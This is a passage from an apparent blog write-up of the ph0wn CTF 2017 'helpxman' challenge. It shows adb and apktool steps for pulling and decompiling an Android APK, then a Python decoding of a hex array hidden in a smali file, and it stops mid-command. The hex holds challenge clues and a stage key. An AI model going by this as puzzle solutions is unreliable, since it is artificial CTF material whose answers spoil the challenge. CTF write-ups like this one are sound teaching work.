tag:blogger.com,1999:blog-59878002024-02-08T03:54:41.111+01:00Duykham's blogNovus ordo seclorum.Unknownnoreply@blogger.comBlogger24125tag:blogger.com,1999:blog-5987800.post-6271280876126001882017-12-09T14:34:00.000+01:002017-12-09T15:29:28.557+01:00ph0wn CTF 2017 Write-up: Misc/helpxman - Stage 2 and 3<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
After successfully getting the flag of <a href="https://duykham.blogspot.fr/2017/12/helpxman-stage-1-when-wearing-smart.html" style="box-sizing: border-box; color: #0366d6; text-decoration-line: none;">Stage 1</a>, the challenge told us to continue looking for something interesthing from the app. After playing around with the app's UI, we found nothing special and decided to look into the <em style="box-sizing: border-box;">internal</em> of the app.</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
By saying <em style="box-sizing: border-box;">internal</em> we meant: let's reverse the source code of the application!</div>
<h3 style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/samduy/home/blob/master/wargames/ph0wn/smartglasses/method-23.md#get-the-applications-apk-file-from-the-glasses" id="user-content-get-the-applications-apk-file-from-the-glasses" style="box-sizing: border-box; color: #0366d6; float: left; line-height: 1; margin-left: -20px; padding-right: 4px; text-decoration-line: none;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><path d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z" fill-rule="evenodd"></path></svg></a>Get the application's APK file from the glasses.</h3>
<ol style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">Connect the glasses with the computer as described in <a href="https://duykham.blogspot.fr/2017/12/helpxman-stage-1-when-wearing-smart.html" style="box-sizing: border-box; color: #0366d6; text-decoration-line: none;">Stage 1</a></li>
<li style="box-sizing: border-box; margin-top: 0.25em;">List all current application installed in the smart glasses:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb shell pm list packages
...
package:ph0wn.reconjet
...
</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
=> We can easily identify the app we are looking for is <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">package:ph0wn.reconjet</code></div>
<ol start="3" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">With the package name found, we can find the actual filename and the location of the APK file:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb shell pm path ph0wn.reconjet
package:/data/app/ph0wn.reconjet-1/base.apk
</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
(<em style="box-sizing: border-box;">Author's note:</em> When writing this write-up, I have to run the app again on my phone, so the path appear above might be different from the one actually found on smartglasses.)</div>
<ol start="4" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">Pull the APK to our host computer for further analysis:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb pull /data/app/ph0wn.reconjet-1/base.apk ./ph0wn.reconjet-1.apk
</code></pre>
<h3 style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/samduy/home/blob/master/wargames/ph0wn/smartglasses/method-23.md#analyse-the-apk-file" id="user-content-analyse-the-apk-file" style="box-sizing: border-box; color: #0366d6; float: left; line-height: 1; margin-left: -20px; padding-right: 4px; text-decoration-line: none;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><path d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z" fill-rule="evenodd"></path></svg></a>Analyse the APK file</h3>
<ol style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">We use [apktook] to decompile the APK file.</li>
</ol>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
On the host computer:</div>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">$ apktool d ./ph0wn.reconjet-1.apk
I: Using Apktool 2.2.3-dirty on ph0wn.reconjet-1.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
All the source/resource files are decoded and saved at <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">ph0wn.reconjet-1</code> directory.</div>
<ol start="2" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">After some quick investigation, we found one suspecious file (and with suspecious name): <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">ph0wn.reconjet-1/smali/ph0wn/reconjet/HiddenActivity.smali</code>.</li>
</ol>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
Look inside the file, we found one suspecious part of source code (at the end of file): from line 114 to line 1012.</div>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;"> :array_0
.array-data 4
0x43
0x6f
0x6e
0x67
0x72
....
....<many lines="">
....
0xa
0x47
0x6f
0x6f
0x64
0x20
0x6c
0x75
0x63
0x6b
0x2e
</many></code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
=> This is definitely suspecious and we have to find a way to decode this set of hexa codes, it may store our flag(s).</div>
<ol start="3" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">By some simple tricks to copy and paste, we put all the hexa codes next to each other for better view, and save them to a file called <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">hexacodes</code>:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">$ cat hexacodes
0x430x6f0x6e0x670x720x610x740x750x6c0x610x740x690x6f0x6e0x730x2c0x200x740x680x690x730x200x690x730x200x730x740x610x670x650x200x320x200x210xa0x540x6f0x200x660x6c0x610x670x200x740x680x690x730x200x730x740x610x670x650x2c0x200x660x6c0x610x670x200x690x730x3a0x200x500x680x300x770x6e0x7b0x4b0x4b0x4b0x500x690x630x6f0x490x730x450x760x650x720x790x770x680x650x720x650x7d0x200x770x680x650x720x650x200x790x6f0x750x200x6d0x750x730x740x200x720x650x700x6c0x610x630x650x200x4b0x4b0x4b0x200x770x690x740x680x200x740x680x650x200x6b0x650x790x200x790x6f0x750x200x660x6f0x750x6e0x640x200x640x750x720x690x6e0x670x200x730x740x610x670x650x200x310x2e0xa0x4b0x650x790x200x660x6f0x720x200x730x740x610x670x650x200x330x200x690x730x3a0x200x630x5f0x480x710x6f0x700x650x660x390x310xa0xa0x530x740x610x670x650x200x330x3a0xa0x530x650x610x720x630x680x200x690x6e0x200x740x680x650x200x720x6f0x6f0x6d0x2c0x200x640x690x720x650x630x740x690x6f0x6e0x200x4e0x570x2c0x200x660x6f0x720x200x610x200x680x690x640x640x650x6e0x200x740x720x650x610x730x750x720x650x200x3a0x290x200x420x650x200x710x750x690x650x740x200x730x6f0x200x740x680x610x740x200x6f0x740x680x650x720x200x740x650x610x6d0x730x200x640x6f0x200x6e0x6f0x740x200x750x6e0x640x650x720x730x740x610x6e0x640x200x770x680x610x740x200x790x6f0x750x200x610x720x650x200x640x6f0x690x6e0x670x2e0xa0x540x6f0x200x660x6c0x610x670x200x740x680x690x730x200x730x740x610x670x650x2c0x200x660x6c0x610x670x200x660x6f0x720x6d0x610x740x200x690x730x3a0x200x500x680x300x770x6e0x7b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x410x410x410x420x420x420x430x430x430x440x440x440x450x450x450x460x460x460x470x470x470x7d0x2e0xa0x570x680x650x720x650x200x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x4b0x200x690x730x200x740x680x650x200x6b0x650x790x200x790x6f0x750x200x660x6f0x750x6e0x640x200x640x750x720x690x6e0x670x200x730x740x610x670x650x200x310x2e0xa0x2d0x200x410x410x410x200x690x730x200x740x680x650x200x630x6f0x6f0x720x640x690x6e0x610x740x650x730x200x6f0x660x200x740x680x650x200x660x690x720x730x740x200x6c0x650x740x740x740x650x720x200x6f0x660x200x770x6f0x720x640x200x460x4f0x520x540x490x4e0x450x540x200x690x730x200x740x680x650x200x740x720x650x610x730x750x720x650x2e0x200x460x690x720x730x740x200x6c0x650x740x740x650x720x200x690x730x200x630x6f0x6c0x750x6d0x6e0x200x280x410x2c0x200x420x2c0x200x430x2e0x2e0x2e0x290x2e0x200x530x650x630x6f0x6e0x640x200x6c0x650x740x740x650x720x200x690x730x200x720x6f0x770x200x280x310x2c0x320x2c0x330x2e0x2e0x2e0x290x2e0x200x540x680x690x720x640x200x6c0x650x740x740x650x720x200x690x730x200x770x6f0x720x640x200x640x690x720x650x630x740x690x6f0x6e0x3a0x200x480x200x660x6f0x720x200x680x6f0x720x690x7a0x6f0x6e0x740x610x6c0x2c0x200x560x200x660x6f0x720x200x760x650x720x740x690x630x610x6c0x2e0x200x530x6f0x2c0x200x690x660x200x460x4f0x520x540x490x4e0x450x540x200x730x740x610x720x740x730x200x610x740x200x720x6f0x770x200x410x2c0x200x630x6f0x6c0x750x6d0x6e0x200x330x2c0x200x680x6f0x720x690x7a0x6f0x6e0x740x610x6c0x6c0x790x2c0x200x770x650x200x770x690x6c0x6c0x200x680x610x760x650x200x410x330x480x2e0xa0x2d0x200x420x420x420x200x690x730x200x740x680x650x200x630x6f0x6f0x720x640x690x6e0x610x740x650x730x200x660x6f0x720x200x540x450x4c0x450x430x4f0x4d0x2c0xa0x2d0x200x430x430x430x200x660x6f0x720x200x500x410x520x490x530x540x450x430x480x2c0xa0x2d0x200x440x440x440x200x660x6f0x720x200x500x4c0x410x540x450x460x4f0x520x4d0x450x2c0xa0x2d0x200x450x450x450x200x660x6f0x720x200x430x4f0x4e0x430x450x500x540x490x4f0x4e0x2c0xa0x2d0x200x460x460x460x200x660x6f0x720x200x450x550x520x450x430x4f0x4d0xa0x2d0x200x610x6e0x640x200x470x470x470x200x660x6f0x720x200x470x520x450x480x410x430x4b0x2e0xa0x470x6f0x6f0x640x200x6c0x750x630x6b0x2e
</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
(<em style="box-sizing: border-box;">Trick</em>: merge all the lines and remove spaces in VIM</div>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">:%s/\n //g
</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
)</div>
<ol start="4" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">One more thing, these hexa codes look pretty much a set of ASCII codes of a very long string, let's try to print them out by a simple python <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">print</code> function.</li>
</ol>
<ul style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;"></li>
</ul>
<div class="highlight highlight-source-python" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; overflow: auto; padding: 16px; word-break: normal; word-wrap: normal;">In []: <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">print</span>((<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">open</span>(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hexacodes<span class="pl-pds" style="box-sizing: border-box;">'</span></span>).read().replace(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>0x<span class="pl-pds" style="box-sizing: border-box;">'</span></span>,<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span><span class="pl-pds" style="box-sizing: border-box;">'</span></span>)).decode(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hex<span class="pl-pds" style="box-sizing: border-box;">'</span></span>))
<span class="pl-ii" style="background-color: #b31d28; box-sizing: border-box; color: #fafbfc;">--------------------------------------------------------------------------</span><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span>
<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">TypeError</span> Traceback (most recent call last)
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;"><</span>ipython<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span><span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">input</span><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span><span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">36</span><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span>ba53ed228ee2<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">></span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">in</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;"><</span>module<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">></span>()
<span class="pl-ii" style="background-color: #b31d28; box-sizing: border-box; color: #fafbfc;">----</span><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">></span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">1</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">print</span>((<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">open</span>(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hexacodes<span class="pl-pds" style="box-sizing: border-box;">'</span></span>).read().replace(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>0x<span class="pl-pds" style="box-sizing: border-box;">'</span></span>,<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span><span class="pl-pds" style="box-sizing: border-box;">'</span></span>)).decode(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hex<span class="pl-pds" style="box-sizing: border-box;">'</span></span>))
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">/</span>usr<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">/</span>lib<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">/</span>python2.7<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">/</span>encodings<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">/</span>hex_codec.pyc <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">in</span> hex_decode(<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">input</span>, errors)
<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">40</span> <span class="pl-s" style="box-sizing: border-box; color: #477bf7;">"""</span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"> 41 assert errors == 'strict'</span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;">---> 42 output = binascii.a2b_hex(input)</span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"> 43 return (output, len(input))</span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"> 44 </span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"></span>
<span class="pl-s" style="box-sizing: border-box; color: #477bf7;">TypeError: Non-hexadecimal digit found</span></pre>
</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
Oops! It should work, but why doesn't it?!</div>
<ul style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">We tried to read only 30 first characters:</li>
</ul>
<div class="highlight highlight-source-python" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; overflow: auto; padding: 16px; word-break: normal; word-wrap: normal;">In []: <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">print</span>((<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">open</span>(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hexacodes<span class="pl-pds" style="box-sizing: border-box;">'</span></span>).read().replace(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>0x<span class="pl-pds" style="box-sizing: border-box;">'</span></span>,<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span><span class="pl-pds" style="box-sizing: border-box;">'</span></span>))[:<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">30</span>].decode(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hex<span class="pl-pds" style="box-sizing: border-box;">'</span></span>))
Congratulations</pre>
</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
=> It works with the first 30 characters. (And the word <em style="box-sizing: border-box;">Congratulations</em> makes us believe that we are on the right way). There must be some thing wroing <em style="box-sizing: border-box;">in the middle of the string</em> makes our process doesn't work.</div>
<ul style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
Look at closely to the string, we found the problem: it is the code <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">0xa</code> that made our print command failed. Isn't it supposed to be a newline character (<code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">0x0a</code>)? Let's fix it and try again.</div>
</li>
<li style="box-sizing: border-box; margin-top: 0.25em;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
Secondly, we noticed that the final '\n' in our <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">hexacodes</code> also makes a problem, so that let's remove it as well.</div>
</li>
<li style="box-sizing: border-box; margin-top: 0.25em;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
The final command is as follows:</div>
</li>
</ul>
<div class="highlight highlight-source-python" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; overflow: auto; padding: 16px; word-break: normal; word-wrap: normal;">In [<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">57</span>]: <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">print</span>((<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">open</span>(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>hexacodes<span class="pl-pds" style="box-sizing: border-box;">'</span></span>).read().replace(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>0xa<span class="pl-pds" style="box-sizing: border-box;">'</span></span>,<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>0x0a<span class="pl-pds" style="box-sizing: border-box;">'</span></span>).replace(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" 